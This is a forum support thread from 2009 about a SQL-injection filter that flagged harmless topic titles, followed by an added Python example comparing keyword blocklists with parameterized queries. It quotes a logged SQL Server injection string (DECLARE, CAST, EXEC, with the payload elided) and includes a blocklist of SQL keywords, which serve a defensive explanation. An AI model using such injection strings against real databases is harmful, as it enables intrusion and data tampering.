FYI on SQL Injection

ohiopbx (Groupie)
Joined: 21 February 2005
Location: United States
Posted: 26 March 2009 at 7:37pm
Afternoon, I appreciate the effort to minimize SQL injection, however the implementation of the SQLInjection functions seems to hurt the forum more than it does make it better. I get a lot of errors b/c my topic titles are like "where-can-i-pick-up-a-bob-long" and the "where" is causing the issue.

I've dealt with SQL injection and this is an example of a true SQL injection:
;DECLARE @S VARCHAR(4000);SET @S=CAST([payload removed] AS VARCHAR(4000));EXEC(@S);-- IP: 117.193.131.212


Here is a link to all the injections I have tracked for one client of mine:
http://johnbauctions.com/gallery/images/log/lastUpdated.txt

So I just wanted to share this.

Cody


Scotty32 (Moderator Group)
Joined: 30 November 2002
Location: Manchester, UK
Posted: 26 March 2009 at 7:59pm
Make sure you are running v9.56a as there was a bug in V9.56.

(had a look at your homepage and you're on 9.56)
S2H.co.uk - WebWiz Mods and Skins

For support on my mods + skins, please use my forum.

ohiopbx (Groupie)
Joined: 21 February 2005
Location: United States
Posted: 26 March 2009 at 8:08pm
Got ya, I'll look for A

WebWiz-Bruce (Admin Group, Web Wiz Developer)
Joined: 03 September 2001
Location: Bournemouth
Posted: 27 March 2009 at 10:30am
The SQL Injection Examples that you have are specific to one type of virus that was very rampant about 10 months ago. There are 100s of different ways to do SQL Injections, which is why the SQL Injection test within Web Wiz Forums is more generic to try and capture all types of SQL Injection, not just the one type in the examples you have.

SQL Injections are quite a complex subject. Probably somewhere in the region of 500 hours have been spent on this with Web Wiz Forums, investigating many different types of SQL Injection across different database types. It's something worth looking into as there are many hacking sites devoted to this subject which are worth checking out to make sure your own sites are fully protected against this type of vulnerability.

The issue that you have with your own forum with the false positives has been fixed with release 9.56a. The issue doesn't affect users who are using the new URL Rewrite Tool.

billd3 (Senior Member)
Joined: 19 February 2003
Location: United States
Posted: 27 March 2009 at 6:17pm
My brain hurts..

Guess I'd better download again, LOL
BillD
http://theamcpages.com
http://theamcforum.com
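
The false positive discussed in this thread, as an added example (not part of the original posts and not Web Wiz Forums code): a hypothetical keyword blocklist flags the topic title from the first post, while a parameterized query treats both that title and the logged request string as plain data. The blocklist, the `topics` table and all function names are assumptions, and SQLite stands in for the forum's database.

```python
import re
import sqlite3

# Hypothetical keyword blocklist standing in for a generic input filter.
# NOT the Web Wiz Forums filter, whose rules are not shown in the thread.
BLOCKLIST = ("select", "where", "declare", "exec", "cast", "--", ";")

def keyword_filter_flags(value):
    """Return blocklist entries found by case-insensitive substring match."""
    lowered = value.lower()
    return [kw for kw in BLOCKLIST if kw in lowered]

def word_boundary_flags(value):
    """Stricter variant: alphabetic keywords must match as whole words."""
    hits = []
    for kw in BLOCKLIST:
        pattern = rf"\b{re.escape(kw)}\b" if kw.isalpha() else re.escape(kw)
        if re.search(pattern, value, re.IGNORECASE):
            hits.append(kw)
    return hits

def lookup_topic(conn, slug):
    """Parameterized lookup: slug is bound as data and never parsed as SQL."""
    row = conn.execute("SELECT id FROM topics WHERE slug = ?", (slug,)).fetchone()
    return row[0] if row else None

def demo():
    benign = "where-can-i-pick-up-a-bob-long"  # topic title from the thread
    # Shape of the logged request from the thread, payload elided as on the page.
    hostile = (";DECLARE @S VARCHAR(4000);SET @S=CAST([payload removed] "
               "AS VARCHAR(4000));EXEC(@S);--")
    conn = sqlite3.connect(":memory:")  # constructed in-memory sample database
    conn.execute("CREATE TABLE topics (id INTEGER PRIMARY KEY, slug TEXT)")
    conn.execute("INSERT INTO topics (slug) VALUES (?)", (benign,))
    return {
        "benign_substring": keyword_filter_flags(benign),
        "benign_word": word_boundary_flags(benign),  # hyphen is a word boundary
        "hostile_word": word_boundary_flags(hostile),
        "benign_lookup": lookup_topic(conn, benign),
        "hostile_lookup": lookup_topic(conn, hostile),
        "rows_after": conn.execute("SELECT COUNT(*) FROM topics").fetchone()[0],
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both filter variants flag the harmless title because a hyphen counts as a word boundary, whereas the bound parameter needs no filtering to keep either string from being executed.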